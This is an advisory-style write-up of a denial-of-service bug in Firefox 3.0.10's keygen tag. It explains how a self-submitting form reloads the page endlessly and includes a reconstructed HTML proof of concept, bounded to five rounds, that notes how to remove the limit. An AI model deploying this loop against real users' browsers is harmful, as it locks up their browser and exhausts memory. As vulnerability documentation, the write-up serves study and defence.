Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit

Hmm....

II. Description
~~~~~~~~~~~~~~
This is a simple design bug that results in an endless loop (and, as a side effect,
memory leaks).

Once upon a time Netscape thought it would be a great idea to add the keygen tag
(<keygen>) as a feature to their browser. The keygen tag offers a simple way of
automatically generating key material using various algorithms. For instance, it is
possible to generate RSA, DSA and EC key material.

"The public key and challenge string are DER encoded as PublicKeyAndChallenge and
then digitally signed with the private key to produce a SignedPublicKeyAndChallenge.
The SignedPublicKeyAndChallenge is base64 encoded, and the ASCII data is finally
submitted to the server as the value of a name-value pair, where the name is
specified by the NAME attribute of the KEYGEN tag."

More information: https://developer.mozilla.org/En/HTML/HTML_Extensions/KEYGEN_Tag

This feature includes the automatic submission of the public part to a script, and
that is the crux. When the enclosing form has no action attribute, submitting it sends
the generated public key as a parameter to the current URI, which reloads the document.
Combining this with a JavaScript body onload() call (or a meta refresh) that submits
the form results in a neat endless loop: every load generates a fresh key pair and
resubmits, blocking access to the UI.

Furthermore, memory is leaked during the process.
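The loop the advisory describes, reconstructed here as an added example; it is not the milw0rm proof of concept and not code from this page. The field name `spkac`, the `keytype`, the `status` element and the round limit are my assumptions. The form has no `action`, so each submission goes back to the current URI, and `onload` resubmits on every load:

```html
<!-- Added reconstruction of the keygen reload loop (not the original PoC).
     Assumed: field name "spkac", keytype "rsa", MAX_ROUNDS bound. -->
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>keygen reload loop</title>
<script>
  // Bound the loop so the mechanism can be observed without wedging the browser.
  // The advisory's variant has no such limit: every load generates a key and resubmits.
  var MAX_ROUNDS = 5;

  function round() {
    var n = parseInt(sessionStorage.getItem('keygenRounds') || '0', 10);
    // location.search carries the base64 SignedPublicKeyAndChallenge from the
    // previous load (empty on the first visit).
    document.getElementById('status').textContent =
      'round ' + n + ', query length ' + location.search.length;
    if (n >= MAX_ROUNDS) {
      return; // stop here; drop this check to reproduce the unbounded loop
    }
    sessionStorage.setItem('keygenRounds', String(n + 1));
    // Submitting the form makes the browser generate a new key pair (the slow,
    // memory-hungry step), base64-encode the SignedPublicKeyAndChallenge and send
    // it as ?spkac=... to the current URI, because the form has no action attribute.
    // A <meta http-equiv="refresh"> pointing at the same URI works in place of onload.
    document.getElementById('f').submit();
  }
</script>
</head>
<body onload="round()">
  <p id="status"></p>
  <form id="f" method="get">
    <keygen name="spkac" keytype="rsa">
  </form>
</body>
</html>
```

Open the page over HTTP (sessionStorage is per origin) and watch the status line: each load arrives with a different `spkac` value and triggers another key generation. Current browsers have removed `<keygen>` entirely, so the form submits nothing and the loop does not occur there; the behaviour only reproduces on browsers of the Firefox 3.0.x era.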

http://www.milw0rm.com/exploits/8822

[screenshot]